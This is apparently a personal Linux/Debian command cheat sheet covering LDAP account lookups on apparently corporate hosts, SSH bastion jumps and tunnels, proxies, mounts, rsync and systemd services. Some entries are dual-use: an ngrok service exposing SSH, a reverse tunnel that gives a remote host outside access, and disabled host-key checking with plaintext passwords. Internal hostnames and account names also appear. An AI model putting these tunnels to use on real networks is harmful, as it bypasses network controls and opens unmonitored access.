LDAP_HOST="ldaps://ldap.ubshost.net:5522"
LDAP_USER="uid=techuserldap,ou=people,dc=ubshost,dc=com"
LDAP_PASSWORD='' 

# log from ldap
# SEARCH conn=61392 op=3 msgID=4 base="ou=groups,dc=com" scope=sub filter="(uid=normaluser)" attrs="ismemberof" requestControls=2.26.140.2.2730.4.1.0 result=0 nentries=0 entrySize=975 authDN="uid=techuserldap,ou=people,dc=ubshost,dc=com" etime=372222
BASE_DN="ou=groups,dc=com"; 
LDAP_FILTER="uid=normaluser"; 

ldapsearch -LLL -o ldif-wrap=no -H $LDAP_HOST -b $BASE_DN -D $LDAP_USER -w $LDAP_PASSWORD $LDAP_FILTER

find owner of account

LDAP_HOST=ubsinfesv0015.vantage.org
LDAP_USER="uid=Vitali,ou=people,dc=group,dc=zur"

ldapsearch -LLL -o ldif-wrap=no -H $LDAP_HOST -b $BASE_DN -D $LDAP_USER -w $LDAP_PASSWORD 
ldapsearch -LLL -o ldif-wrap=no -h $LDAP_HOST -b "DC=vantage,DC=org" samaccountname=pen_import-s
ldapsearch -LLL -o ldif-wrap=no -h $LDAP_HOST -b "OU=Accounts,DC=vantage,DC=org" samaccountname=cherkavi
ldapsearch -LLL -o ldif-wrap=no -h $LDAP_HOST -b "OU=Accounts,DC=vantage,DC=org" -s sub "displayName=Vitalii Cherkashyn"
ldapsearch -LLL -o ldif-wrap=no -h $LDAP_HOST -b "OU=Accounts,DC=vantage,DC=org" -s sub "[email protected]"
ldapsearch -LLL -o ldif-wrap=no -h $LDAP_HOST -b "OU=Accounts,DC=vantage,DC=org" -s sub "[email protected]" -D "CN=Vitalii Cherkashyn,OU=Users,OU=UBS,OU=Accounts,DC=vantage,DC=org" -Q -W
# in case of error message: No Kerberos credentials available
kinit pen_import-s

find all accounts in LDAP

# list of the accounts
ldapsearch -LLL -o ldif-wrap=no -E pr=1000/noprompt -h $LDAP_HOST -b "DC=vantage,DC=org" samaccountname=r-d-ubs-developer member 
# account name and e-mail 
ldapsearch -LLL -o ldif-wrap=no -E pr=1000/noprompt -h $LDAP_HOST -b "DC=vantage,DC=org" cn="Vitalii Cherkashyn" samaccountname
ldapsearch -LLL -o ldif-wrap=no -E pr=1000/noprompt -h $LDAP_HOST -b "DC=vantage,DC=org" cn="Vitalii Cherkashyn" samaccountname mail

Architecture

image image

links

Linux Debian cheat sheet

common

commands gnu commands

time 
# run GNU version of the command:
/etc/bin/time
# or 
\time 

retrieve human readable information from binary files

strings /usr/share/teams/libEGL.so | grep git

place for scripts, permanent script

### system wide for all users
### /etc/profile is only run at login
### ~/.profile file runs each time a new shell is started 
# System-wide .bashrc file for interactive bash(1) shells.
/etc/bash.bashrc
# system-wide .profile file for the Bourne shell sh(1)
/etc/profile
/etc/environment
/etc/profile.d/my_new_update.sh

### during user login
~/.bash_profile
# executed by Bourne-compatible login shells.
~/.profile 

# during open the terminal, executed by bash for non-login shells.
~/.bashrc

socket proxy, proxy to remote machine

ssh -D <localport> <user>@<remote host>

and checking if it is working for 'ssh -D 7772 [email protected]'

ssh -o "ProxyCommand nc -x 127.0.0.1:7772 %h %p" [email protected]

jumpserver proxy jump host bastion

# ssh [email protected] -o "proxycommand ssh -W %h:%p -i /home/admin/.ssh/identity-bastionhost [email protected]"  -t "su - admin" 
# ssh [email protected] -t "su admin"  ssh -i /home/admin/.ssh/identity-bastionhost [email protected]
# ssh [email protected] "su admin && ssh -i /home/admin/.ssh/identity-bastionhost [email protected]"
# ssh [email protected] -t "su admin" "ssh -i /home/admin/.ssh/identity-bastionhost [email protected]"
# ssh [email protected] -t "su admin"  [email protected]

# localhost ---->  35.35.13.49 ---->   10.0.12.10
# all identity files must be placed on localhost !!!
ssh -Ao ProxyCommand="ssh -W %h:%p -p 22 $PROD_BASTION_USER@$PROD_BASTION_HOST" -i $EC2_INVENTORY -p EC2_AIRFLOW_PORT $EC2_AIRFLOW_USER@$EC2_AIRFLOW_HOST $*

scp bastion scp proxy scp copy via bastion

scp -o "ProxyCommand ssh -W %h:%p -p 22 $PROD_BASTION_USER@$PROD_BASTION_HOST" -i $EC2_KEY 1.md $EC2_USER@$EC2_HOST:~/

scp error

bash: scp: command not found

solution: scp should be installed on both!!! hosts

tunnel, port forwarding from local machine to outside

ssh -L <local_port>:<remote_host from ssh_host>:<remote_port> <username>@<ssh_host>
# ssh -L 28010:remote_host:8010 user_name@remote_host
ssh -L <local_port>:<remote_host from ssh_host>:<remote_port> <ssh_host>
# ssh -L 28010:vldn337:8010 localhost

# destination service on the same machine as ssh_host
# localport!=remote_port (28010!=8010)
ssh -L 28010:127.0.0.1:8010 user_name@remote_host

from local port 7000 to remote 5005

ssh -L 7000:127.0.0.1:5005 [email protected]

browser(ext_host) -> 134.190.2.5 -> 134.190.200.201

[email protected]:~$ ssh -L 134.190.2.5:8091:134.190.200.201:8091 [email protected]
user@ext_host:~$ wget 134.190.2.5:8091/echo 

tunnel, port forwarding from outside to localmachine

# ssh -R <remoteport>:<local host name>:<local port> <hostname>
# localy service on port 9092 should be started
# and remotelly you can reach it out just using 127.0.0.1:7777
ssh -R 7777:127.0.0.1:9092 localhost

tunnel for remote machine with proxy, local proxy for remote machine, remote proxy access

//TODO local=======>remote
after that, remote can use local as proxy

first of all start local proxy (proxychains or redsock)

sudo apt install privoxy
sudo vim /etc/privoxy/config
# listen-address  127.0.0.1:9999
# forward-socks5t / http://my-login:[email protected]:8080 .
# forward-socks4a / http://my-login:[email protected]:8080 .
# or 
# forward   /      http://my-login:[email protected]:8080
systemctl start privoxy
# locally proxy server on port 9999 should be started
ssh -D 9999 127.0.0.1 -t ssh -R 7777:127.0.0.1:9999 [email protected]

# from remote machine you can execute 
wget -e use_proxy=yes -e http_proxy=127.0.0.1:7777 https://google.com

ssh suppress banner, ssh no invitation

ssh -q my_server.org

ssh verbosive, ssh log, debug ssh

ssh -vv my_server.org

ssh variable ssh envvar ssh send variable

ssh variable in command line

ssh -t user@host VAR1="Petya" bash -l

sshd config

locally: ~/.ssh/config

SendEnv MY_LOCAL_VAR

remotely: /etc/ssh/sshd_config

AcceptEnv MY_LOCAL_VAR

ssh environment, execute on remote server bash file after login

echo "VAR1=Hello" > sshenv
echo "VAR2=43" >> sshenv
scp sshenv user@server:~/.ssh/environment
ssh user@server myscript

ssh run command

ssh -t user@host 'bash -s' < my-script.sh
# with arguments
ssh -t user@host 'bash -s' -- < my-script.sh arg1 arg2 arg3
# ssh document here 
ssh -T user@host << _dochere_marker
cd /tmp
echo $(date) >> visit-marker.txt
_dochere_marker

local proxy cntlm, cntlm proxy

  app_1 --.
           \
  app_2 --- ---> local proxy <---> External Proxy <---> WWW
   ...     /
  app_n --'

install cntlm

# temporarily set proxy variables for curl and brew to work in this session
$ export http_proxy=http://<user>:<password>@proxy-url:proxy-port
$ export https_proxy=$http_proxy

# update & upgrade apt
$ sudo --preserve-env=http_proxy,https_proxy apt-get update
$ sudo --preserve-env=http_proxy,https_proxy apt-get upgrade

# finally, install cntlm
sudo --preserve-env=http_proxy,https_proxy apt-get install cntlm

edit configuration

vim ~/.config/cntlm/cntlm.conf
Username user-name
Domain  domain-name
Proxy   proxy-url:proxy-port
NoProxy localhost, 127.0.0.*, 10.*, 192.168.*, *.zur
Listen  3128

or globally

sudo vim /etc/cntlm.conf

~/bin/proxy-start.sh

#!/bin/sh

pidfile=~/.config/cntlm/cntlm.pid

if [ -f $pidfile ]; then
kill "$(cat $pidfile)"
sleep 2
fi

cntlm -c ~/.config/cntlm/cntlm.conf -P $pidfile -I

source ~/bin/proxy-settings.sh

proxy_url="http://127.0.0.1:3128"
export http_proxy=$proxy_url
export https_proxy=$http_proxy
export HTTP_PROXY=$http_proxy
export HTTPS_PROXY=$http_proxy

export _JAVA_OPTIONS="-Dhttp.proxyHost=127.0.0.1 -Dhttp.proxyPort=3128 -Dhttps.proxyHost=127.0.0.1 -Dhttps.proxyPort=3128 -Dhttps.nonProxyHosts=localhost|*.ubsgroup.net|*.muc -Dhttp.nonProxyHosts=localhost|*.ubsgroup.net|*.zur"

check status

sudo invoke-rc.d cntlm status
ss -lt | grep 3128

possible solution to detect remote client to your machine

# open access
ping -s 120 -c 1 146.255.193.66
ping -s 121 -c 1 146.255.193.66
ping -s 122 -c 1 146.255.193.66

# close access
ping -s 123 -c 1 146.255.193.66

open ports, open connections, listening ports, application by port, application port, process port, pid port

# list of open files
sudo lsof -i -P -n | grep LISTEN
# list of files for specific user
lsof -u my_own_user 

# limit of files for user
ulimit -a


# list of open connections
sudo netstat -tulpan | grep LISTEN
sudo ss -tulwn | grep LISTEN

# list of open ports
sudo nmap -sT -O 127.0.0.1

# print pid of process that occupying 9999 port
sudo ss -tulpan 'sport = :9999'

# open input output
iotop

# list of services mapping service to port mapping port to service
less /etc/services

mount drive to path mount

# <drive> <path>
sudo mount /dev/sdd /tin

mount remote filesystem via ssh, map folder via ssh, ssh remote folder

sudo mkdir /mnt/vendor-cluster-prod
sudo sshfs -o allow_other,IdentityFile=~/.ssh/id_rsa [email protected]:/remote/path/folder /mnt/vendor-cluster-prod
# sudo fusermount -u /remote/path/folder
# sudo umount /remote/path/folder

mount remote filesystem via ftp

sudo apt install curlftpfs
sudo mkdir /mnt/samsung-note
curlftpfs testuser:[email protected]:2221 /mnt/samsung-note/

samsung phone android phone folder

cd /run/user/1000/gvfs
# phone samsung
cd /run/user/1000/gvfs/mtp:host=SAMSUNG_SAMSUNG_Android_RFxxxxxxxxx

mount windows folder, mount windows shared folder

sudo apt install nfs-common
sudo apt install cifs-utils

sudo mkdir -p /mnt/windows-computer
USER_NAME='my-username'
USER_DOMAIN='ZUR'
USER_SERVER='//u015029.ubsbank.net/home$/x453337/'
sudo mount -t cifs -o auto,gid=$(id -g),uid=$(id -u),username=$USER_NAME,domain=$USER_DOMAIN,vers=2.1 $USER_SERVER /mnt/windows-computer

mount issue

bad option;  for several filesystems (e.g. nfs, cifs) you might need a /sbin/mount.<type> helper program.
sudo apt-get install nfs-common
sudo apt-get install cifs-utils

mount usb drive temporary mount disk

sudo mount /dev/sdd    /media/tina-team

unmount usb detach usb

umount /dev/sdd

mount usb drive permanently mount, map drive

sudo mkdir /mnt/disks/k8s-local-storage1
sudo chmod 755 /mnt/disks/k8s-local-storage1
sudo ln -s /mnt/disks/k8s-local-storage1/nfs nfs1
ls -la /mnt/disks
ls -la /mnt

sudo blkid
sudo vim /etc/fstab
# add record
# UUID=42665716-1f89-44d4-881c-37b207aecb71 /mnt/disks/k8s-local-storage1 ext4 defaults 0 0

# refresg fstab reload
sudo mount -av
ls /mnt/disks/k8s-local-storage1

option 2

sudo vim /etc/fstab
# add line
# /dev/disk/by-uuid/8765-4321    /media/usb-drive         vfat   0   0

# copy everything from ```mount```
# /dev/sdd5 on /media/user1/e91bd98f-7a13-43ef-9dce-60d3a2f15558 type ext4 (rw,nosuid,nodev,relatime,uhelper=udisks2)
# /dev/sda1 on /media/kali/usbdata type fuseblk (rw,nosuid,nodev,relatime,user_id=0,group_id=0,default_permissions,allow_other,blksize=4096,uhelper=udisks2)

# systemctl daemon-reload

sudo mount -av

mount remote drive via network

10.55.0.3:/mnt/disks/k8s-local-storage/nfs /mnt/nfs nfs rw,noauto,x-systemd.automount,x-systemd.device-timeout=10,timeo=14 0 0

drive uuid hdd uuid

blkid

list drives, drive list, attached drives

lsblk
fdisk -l

create filesystem, format drive

sudo mkfs -t xfs /dev/xvdb
sudo mke2fs /dev/xvdb

Network Attached Storage ( NAS ), Network File System ( NFS ), RAID

zfs

gpg signature check, asc signature check, crt signature check

kgpg --keyserver keyserver.ubuntu.com --recv-keys 9032CAE4CBFA933A5A2145D5FF97C53F183C045D
gpg --import john-brooks.asc
gpg --verify ricochet-1.1.4-src.tar.bz2.asc

in case of error like:

gpg: Can't check signature: No public key
gpg --import gpg-pubkey.txt
gpg --verify openldap-2.5.13.tgz.asc
sudo apt install oathtool
oathtool -b --totp $CODE_2FA

oathtool: base32 decoding failed: Base32 string is invalid

connect to remote machine via ssh without credentials

# generate new RSA keys, create RSA, generate keys
ssh-keygen -t rsa
ssh-keygen -t rsa -b 4096 -f /tmp/my_ssh_key

( check created file /home/{user}/.ssh/id_rsa )

# if you have copied it, check permissions
chmod 700 ~/.ssh
chmod 700 ~/.ssh/*

print public ssh keys, ssh public keys

cat ~/.ssh/id_rsa.pub

passphrase skip typing ssh-keygen without passphrase, avoid Enter passphrase for key

eval `ssh-agent -s` 
ssh-add $HOME/.ssh/id_rsa

login without typing password

# ssh
sshpass -p my_password ssh [email protected]
sshpass -p my_password ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null [email protected]
# ftp 
sshpass -p $CHINA_PASS sftp -P $CHINA_JUMP_SERVER_PORT $CHINA_USER@$CHINA_JUMP_SERVER

login without typing password

echo $my_password | ssh [email protected]

copy ssh key to remote machine,

ssh-copy-id {username}@{machine ip}:{port}
ssh-copy-id -i ~/.ssh/id_rsa.pub -o StrictHostKeyChecking=no [email protected]
# manual execution
cat ~/.ssh/id_rsa.pub | ssh [email protected] 'cat >> ~/.ssh/authorized_keys'

# output nothing when ssh key exists, ssh check
ssh-copy-id [email protected] 2>/dev/null

after copying you can use ssh connection with inventory file

# id_rsa - your private key 
ssh -i ~/.ssh/id_rsa [email protected]

automate copying password

./ssh-copy.expect my_user ubsad00015.vantage.org "my_passw" 
#!/usr/bin/expect -f
set user [lindex $argv 0];
set host [lindex $argv 1];
set password [lindex $argv 2];

spawn ssh-copy-id $user@$host
expect "])?"
send "yes\n"
expect "password: "
send "$password\n"
expect eof

sometimes need to add next

ssh-agent bash
ssh-add ~/.ssh/id_dsa or id_rsa

remove credentials ( undo previous command )

ssh-keygen -f "/home/{user}/.ssh/known_hosts" -R "10.140.240.105"

copy ssh key to remote machine, but manually:

cat .ssh/id_rsa.pub | ssh {username}@{ip}:{port} "cat >> ~/.ssh/authorized_keys"
chmod 700 ~/.ssh ;
chmod 600 ~/.ssh/authorized_keys

issue broken pipe ssh

vim ~/.ssh/config

Host *
    ServerAliveInterval 30
    ServerAliveCountMax 5

ssh fingerprint checking

ssh -o StrictHostKeyChecking=no [email protected]
sshpass -p my_password ssh -o StrictHostKeyChecking=no [email protected]

# check ssh-copy-id, check fingerprint
ssh-keygen -F bmw000013.adv.org
# return 0 ( and info line ), return 1 when not aware about the host

manage multiply keys

$ ls ~/.ssh
-rw-------  id_rsa
-rw-------  id_rsa_bmw
-rw-r--r--  id_rsa_bmw.pub
-rw-r--r--  id_rsa.pub
$ cat ~/.ssh/config 
IdentityFile ~/.ssh/id_rsa_bmw
IdentityFile ~/.ssh/id_rsa

copy from local machine to remote one, remote copy

scp filename.txt [email protected]:~/temp/filename-from-local.txt

sshpass -p $CHINA_PASS scp -P $CHINA_JUMP_SERVER_PORT 1.txt $CHINA_USER@$CHINA_JUMP_SERVER:
sshpass -p $CHINA_PASS scp -P $CHINA_JUMP_SERVER_PORT 1.txt $CHINA_USER@$CHINA_JUMP_SERVER:~/
sshpass -p $CHINA_PASS scp -P $CHINA_JUMP_SERVER_PORT 1.txt $CHINA_USER@$CHINA_JUMP_SERVER:~/1.txt

copy from remote machine to local

scp -r [email protected]:~/temp/filename-from-local.txt filename.txt 
scp -i $EC2_KEY -r [email protected]:~/airflow/logs/shopify_product_create/product_create/2021-07-17T02:31:19.880705+00:00/1.log 1.log

copy directory to remote machine, copy folder to remote machine

scp -pr /source/directory user@host:the/target/directory

the same as local copy folder

cp -var /path/to/folder /another/path/to/folder

copy file with saving all attributes, copy attributes, copy file with attributes

cp -r --preserve=mode,ownership,timestamps /path/to/src /path/to/dest
cp -r --preserve=all /path/to/src /path/to/dest

copy only when changed

cp --checksum /path/to/src /path/to/dest

change owner

# change owner recursively for current folder and subfolders
sudo chown -R $USER .

rsync singe file copy from remote

#!/bin/bash

if [[ $FILE_PATH == "" ]]; then
    echo "file to copy: $FILE_PATH"
else
    if [[ $1 == "" ]]; then
    	echo "provide path to file or env.FILE_PATH"
    else
        FILE_PATH=$1
    fi
fi

USER_CHINA=cherkavi
HOST=10.10.10.1

scp -r $USER_CHINA@$HOST:$FILE_PATH .
# rsync -avz --progress  $USER_CHINA@$HOST:$FILE_PATH $FILE_PATH

sync folders synchronize folders, copy everything between folders, diff folder

!!! rsync has direction from to

# print diff 
diff -qr /tmp/first-folder/ /tmp/second-folder

# local sync
rsync -r /tmp/first-folder/ /tmp/second-folder
## Attributes Verbosive Unew-modification-time
rsync -avu /tmp/first-folder/ /tmp/second-folder

# sync remote folder to local ( copy FROM remote )
rsync -avz [email protected]:~/test-2020-02-28  /home/projects/temp/test-2020-02-28
# sync remote folder to local ( copy FROM remote ) with specific port with compression
rsync -avz -e 'ssh -p 2233' [email protected]:~/test-2020-02-28  /home/projects/temp/test-2020-02-28

# sync local folder to remote ( copy TO remote )
rsync -avz /home/projects/temp/test-2020-02-28  [email protected]:~/test-2020-02-28  
# sync local folder to remote ( copy TO remote ) include exclude
rsync -avz --include "*.txt" --exclude "*.bin" /home/projects/temp/test-2020-02-28  [email protected]:~/test-2020-02-28  

# sync via bastion
rsync -avz -e 'ssh -Ao ProxyCommand="ssh -W %h:%p -p 22 $PROD_BASTION_USER@$PROD_BASTION_HOST" -i '$EC2_KEY $SOURCE_FOLDER/requirements.txt $EC2_LIST_COMPARATOR_USER@$EC2_LIST_COMPARATOR_HOST:~/list-comparator/requirements.txt
function cluster-prod-generation-sync-to(){
  if [[ $1 == "" ]]; then
      return 1
  fi
  rsync -avz . $USER_GT_LOGIN@ubsdpd00013.vantage.org:~/$1
}

create directory on remote machine, create folder remotely, ssh execute command, ssh remote execution

ssh user@host "mkdir -p /target/path/"

ssh execute command and detach ssh execute detached ssh command SIGHUP Signal Hang UP

each_node="bpde00013.ubsbank.org"
REMOTE_SCRIPT="/opt/app/1.sh"
REMOTE_OUTPUT_LOG="/var/log/1.output"

ssh $REMOTE_USER"@"$each_node "nohup $REMOTE_SCRIPT </dev/null > $REMOTE_OUTPUT_LOG 2>&1 &"

ssh xserver, ssh graphical

option1

deamon settings

vim /etc/ssh/sshd_config
sudo systemctl restart sshd
X11Forwarding yes

connect with X11 forwarding

option 2

export DISPLAY=:0.0
xterm

here document, sftp batch command with bash

sftp -P 2222 my_user@localhost << END_FILE_MARKER
ls
exit
END_FILE_MARKER

env variable enviroment variables replace

echo "${VAR_1}" | envsubst
envsubst < path/to/file/with/variables > path/to/output/file

map folder to another path, mount dir to another location

# map local /tmp folder to another path/drive
sudo mount -B /tmp /mapped_drive/path/to/tmp

mount cdrom ( for virtual machine )

sudo mount /dev/cdrom /mnt

create ram disc

mkdir -p /mnt/my-ram
mount -t tmpfs tmpfs /mnt/my-ram -o size=1024M

repeat command with predefined interval, execute command repeatedly, watch multiple command watch pipe

watch -n 60 'ls -la | grep archive'

execute command in case of changes watch file

ls *.txt | entr firefox 

repeat last command

!!

repeat last command with substring "flow" included into whole command line

!?flow

execute in current dir, inline shell execution

. goto-command.sh

directories into stack

pushd
popd
dirs

to previous folder

cd -

sudo reboot

shutdown -r now

sort, order

# sort for human readable 
sort -h
sort -n
sort -v 

#  sort by column ( space delimiter )
sort -k 3 <filename>

# sort by column number, with delimiter, with digital value ( 01, 02....10,11 )
sort -g -k 11 -t "/" session.list

# sort with reverse order
sort -r <filename>

print file with line numbers, output linenumbers

cat -n <filename>

split and join big files split and merge, make parts from big file copy parts

split --bytes=1M /path/to/image/image.jpg /path/to/image/prefixForNewImagePieces
# --bytes=1G

cat prefixFiles* > newimage.jpg

cut big file, split big file, cat after threshold

cat --lines=17000 big_text_file.txt

unique lines (duplications) into file

add counter and print result

uniq --count

duplicates

print only duplicates ( distinct )

uniq --repeated

print all duplications

uniq -D

unique

uniq --unique

output to columns format output to column

ls | column -t -c

print column from file, split string with separator

cut --delimiter "," --fields 2,3,4 test1.csv
cut --delimiter "," -f2,3,4 test1.csv

substring with fixed number of chars: from 1.to(15) and 1.to(15) && 20.to(50)

cut -c1-15
cut -c1-15,20-50

output to file without echo on screen, echo without typing on screen

echo "text file" | grep "" > $random_script_filename

system log information, logging

# read log
tail -f /var/log/syslog
# write to system log
echo "test" | /usr/bin/logger -t cronjob
# write log message to another system
logger --server 192.168.1.10 --tcp "This is just a simple log line"

/var/log/messages

commands execution logging session logging

# write output of command to out.txt and execution time to out-timing.txt
script out.txt --timing=out-timing.txt

repository list of all repositories

sudo cat /etc/apt/sources.list*

add repository

add-apt-repository ppa:inkscape.dev/stable

you can find additional file into

/etc/apt/sources.list.d

or manually add repository

# https://packages.debian.org/bullseye/amd64/skopeo/download
# The following signatures couldn't be verified because the public key is not available
# deb [trusted=yes] http://ftp.at.debian.org/debian/ bullseye main contrib non-free

remove repository

sudo add-apt-repository -r ppa:danielrichter2007/grub-customizer

search after adding

apt-cache search inkscape

update from one repo, single update

sudo apt-get update -o Dir::Etc::sourcelist="sources.list.d/cc-ros-mirror.list" -o Dir::Etc::sourceparts="-" -o APT::Get::List-Cleanup="0" 

remove repository

sudo rm /etc/apt/sources.list.d/inkscape.dev*

avoid to put command into history, hide password into history, avoid history

add space before command

history settings history ignore duplicates history datetime

HISTTIMEFORMAT="%Y-%m-%d %T "
HISTCONTROL=ignoreboth
history

bash settings, history lookup with arrows, tab autocomplete

~/.inputrc

"\e[A": history-search-backward
"\e[B": history-search-forward
set show-all-if-ambiguous on
set completion-ignore-case on
TAB: menu-complete
"\e[Z": menu-complete-backward
set show-all-if-unmodified on
set show-all-if-ambiguous on

script settings

# stop execution when non-zero exit
set -e

# stop execution when error happend even inside pipeline 
set -eo pipeline

# stop when access to unknown variable 
set -u

# print each command before execution
set -x

# export source export variables
set -a
source file-with-variables.env

execute command via default editor

ctrl+x+e

edit last command via editor

fc

folder into bash script

working folder

pwd

process directory process working dir

pwdx <process id>

bash reading content of the file to command-line parameter

--extra-vars 'rpm_version=$(cat version.txt)'
--extra-vars 'rpm_version=`cat version.txt`'

all command line arguments to another program

original.sh $*

ubuntu install python

# ubuntu 18 python 3.8
sudo apt install python3.8
sudo rm /usr/bin/python3
sudo ln -s /usr/bin/python3.8 /usr/bin/python3
python3 --version
python3 -m pip install --upgrade pip

auto execute during startup, run during restart, autoexec.bat, startup script run

cron startup run

@reboot

rc0...rc1 - runlevels of linux

ID Name Description
0. Halt Shuts down the system.
1. Single-user Mode Mode for administrative tasks.
2. Multi-user Mode Does not configure network interfaces and does not export networks services.
3. Multi-user Mode with Networking Starts the system normally.
4. Not used/User-definable For special purposes.
5. Start the system normally with with GUI As runlevel 3 + display manager.
6. Reboot Reboots the system.

one of folder: /etc/rc1.d ( rc2.d ... )
contains links to /etc/init.d/S10nameofscript ( for start and K10nameofscript for shutdown ) can understand next options: start, stop, restart

/etc/init.d/apple-keyboard

#!/bin/sh
# Apple keyboard init
#
### BEGIN INIT INFO
# Provides:        cherkashyn
# Required-Start:  $local_fs $remote_fs
# Required-Stop:   $local_fs $remote_fs
# Default-Start:   4 5
# Default-Stop:
# Short-Description: apple keyboard Fn activating
### END INIT INFO

# Carry out specific functions when asked to by the system
case "$1" in
  start)
    echo "Starting script blah "
    ;;
  stop)
    echo "Stopping script blah"
    ;;
  *)
    echo "Usage: /etc/init.d/blah {start|stop}"
    exit 1
    ;;
esac
exit 0
sudo update-rc.d apple-keyboard defaults
# sudo update-rc.d apple-keyboard remove
find /etc/rc?.d/ | grep apple | xargs ls -l

custom service, service destination

sudo vim /etc/systemd/system/YOUR_SERVICE_NAME.service
Description=GIVE_YOUR_SERVICE_A_DESCRIPTION

Wants=network.target
After=syslog.target network-online.target

[Service]
Type=simple
ExecStart=YOUR_COMMAND_HERE
Restart=on-failure
RestartSec=10
KillMode=process

[Install]
WantedBy=multi-user.target

ngrok

Description=GIVE_YOUR_SERVICE_A_DESCRIPTION

Wants=network.target
After=syslog.target network-online.target

[Service]
User=my_own_user
Group=my_own_user
Type=simple
ExecStart=/snap/ngrok/53/ngrok --authtoken aaabbbcccddd  tcp 22
Restart=on-failure
RestartSec=10
KillMode=process

[Install]
WantedBy=multi-user.target

service with docker container, service dockerized app

[Unit]
Description=Python app 
After=docker.service
Requires=docker.service

[Service]
TimeoutStartSec=5
Restart=always
ExecStartPre=-/usr/bin/docker stop app
ExecStartPre=-/usr/bin/docker rm app
ExecStart=/usr/bin/docker run \
    --env-file /home/user/.env.app \
    --name app \
    --publish 5001:5001 \
    appauth
ExecStop=/usr/bin/docker stop app

[Install]
WantedBy=multi-user.target

managing services

# alternative of chkconfig
# alternative of sysv-rc-conf

# list all services, service list 
systemctl --all
systemctl list-units --type=service --all

# in case of any changes in service file 
systemctl enable YOUR_SERVICE_NAME

systemctl start YOUR_SERVICE_NAME
systemctl status YOUR_SERVICE_NAME
systemctl daemon-reload YOUR_SERVICE_NAME
systemctl stop YOUR_SERVICE_NAME

reset X-server, re-start xserver, reset linux gui ubuntu only

Ctrl-Alt-F1
sudo init 3
sudo init 5
sudo pkill X
sudo service lightdm stop
sudo service lightdm force-reload

start

sudo startx
sudo service lightdm start

xbind catch shortcuts, custom shortcuts

doesn't work with "super"/"win" button should be activated in "startup"/service

# "echo 'pressed' > ~/out.txt"
# "xdotool getactivewindow key ctrl+c"
xte 'keydown Control_L' 'key c' 'keyup Control_L'
    release + Control_L + c
xbindkeys --key

xserver automation

keymap

apt-get install xdotool
xdotool windowactivate $each_window 
xdotool key --window $each_window Return alt+f e Down Down Return

linux x-server automation

sudo apt install xautomation
# emulate key Super+L
xte 'keydown Super_L' 'key l' 'keyup Super_L'

find all symlinks

ls -lR . | grep ^l

grep asterix, grep between

cat secrets | grep ".*Name.*Avvo.*"

grep exclude grep skip folder grep folder

grep -ir --exclude-dir=node_modules "getServerSideProps"
grep -r --files-with-matches --exclude-dir={ad-frontend,data-portal}  "\"index\""

grep multi folders

grep -ir "getServerSideProps" /home/folder1 /home/folder2

full path to file, file behind symlink, absolute path to file

readlink -f {file}
readlink -f `dirname $0`
realpath {file}

or

python -c 'import os.path; print(os.path.realpath("symlinkName"))'

filename from path

basename {file}

folder name from path, folder of file, file directory, file folder, parent folder, parent dir

dirname {file}
nautilus "$(dirname -- "$PATH_TO_SVG_CONFLUENCE")"

print full path to files inside folder, check folder for existence path check for existence

ls -d <path to folder>/*
for each_path in `find /mapr/dp.ch/vantage/data/collected/MDF4/complete -maxdepth 5`; do    
    if [ -d "$each_path" ]; 
    then
        echo "exists: $each_path"
    else
        echo "not a path: $each_path"        
    fi
done

ls directory, ls current folder, ls path, ls by path

find $FOLDER -maxdepth 4 -mindepth 4 | xargs ls -lad

calculcate size of files by type

find . -name "*.java" -ls | awk '{byte_size += $7} END{print byte_size}'

calculcate size of files by type, list of files, sort files by size

du -hs * | sort -h

real path to link

readlink 'path to symlink'

where is program placed, location of executable file

which "program-name"

permission denied

# issue with permission ( usually on NFS or cluster )
# find: '/mnt/nfs/ml-training-mongodb-pvc/journal': Permission denied
# 
# solution:
sudo docker run --volume  /mnt/nfs:/nfs -it busybox /bin/sh
chmod -R +r /nfs/ml-training-mongodb-pvc/journal

find file by name find by name

locate {file name}

exclude DB

/etc/updatedb.conf

find files by mask

locate -ir "brand-reader*"
locate -b "brand-reader"

you need to update filedatabase: /var/lib/mlocate/mlocate.db

sudo updatedb

find file, search file, skip permission denied suppress permission denied find by name

find . -name "prd-ticket-1508.txt"  2>&1 | grep -v "Permission denied"
# suppress permission denied, error pipe with stderror
find /tmp -name 'labeler.jar' |& grep -v "Permission denied"

find multiply patterns

find . -name "*.j2" -o -name "*.yaml"

find file by last update time

find / -mmin 2

find with exec find md5sum

find . -exec md5sum {} \;
find . -name "*.json" | while read each_file; do cat "$each_file" > "${each_file}".txt; done

delete files that older than 5 days

find ./my_dir -mtime +5 -type f -delete
# default variable, env var default
find ${IMAGE_UPLOAD_TEMP_STORAGE:-/tmp/image_upload} -mtime +1 -type f -delete

find files/folders by name and older than 240 min

find /tmp -maxdepth 1 -name "native-platform*" -mmin +240 | xargs  --no-run-if-empty -I {} sudo rm -r {} \; >/dev/null 2>&1

find files/folders by regexp and older than 240 min, find depth, find deep

find /tmp -maxdepth 1 -mmin +240 -iname "[0-9]*\-[0-9]" | xargs -I {} sudo rm -r {} \; >/dev/null 2>&1

find large files, find big files

find . -type f -size +50000k -exec ls -lh {} \;
find . -type f -size +50000k -exec ls -lh {} \; | awk '{ print $9 ": " $5 }'

find files on special level, find on level

find . -maxdepth 5 -mindepth 5

find by mask find

find /mapr/vantage/data/store/processed/*/*/*/*/*/Metadata/file_info.json

find with excluding folders, find exclude

find . -type d -name "dist" ! -path  "*/node_modules/*"

find function declaration, print function, show function

type <function name>
declare -f <function name>

builtin, overwrite command, rewrite command

cd()
{
   # builtin going to execute not current, but genuine function
   builtin cd /home/projects
}

folder size, dir size, directory size, size directory, size folder size of folder, size of directory

sudo du -shc ./*
sudo du -shc ./* | sort -rh | head -5

free space, space size, dir size, no space left

df -ha
df -hT /
du -shx /* | sort -h

# size of folder
du -sh /home

# size my sub-folders
du -mh /home

# print first 5 leaders of size-consumers
# slow way: du -a /home | sort -n -r | head -n 5
sudo du -shc ./* | sort -rh | head -5

du -ch /home
# find only files with biggest size ( top 5 )
find -type f -exec du -Sh {} + | sort -rh | head -n 5

yum ( app search )

yum list {pattern}

( example: yum list python33 )

yum install {package name}
yum repolist all
yum info {package name}
yumdb info {package name}

print all packages and sort according last updated on top

rpm -qa --last

information about package ( help page, how to execute ... )

rpm -qai

information about package with configuration

rpm -qaic
rpm -qi wd-tomcat8-app-brandserver

install without sudo rpm without sudo

rpm -ivh --prefix=$HOME browsh_1.6.4_linux_amd64.rpm

jobs

fg, bg, jobs

stop process and start it into background

ctrl-Z
bg

stop process and resume it, disconnect from process and leave it running

ctrl-Z
fg

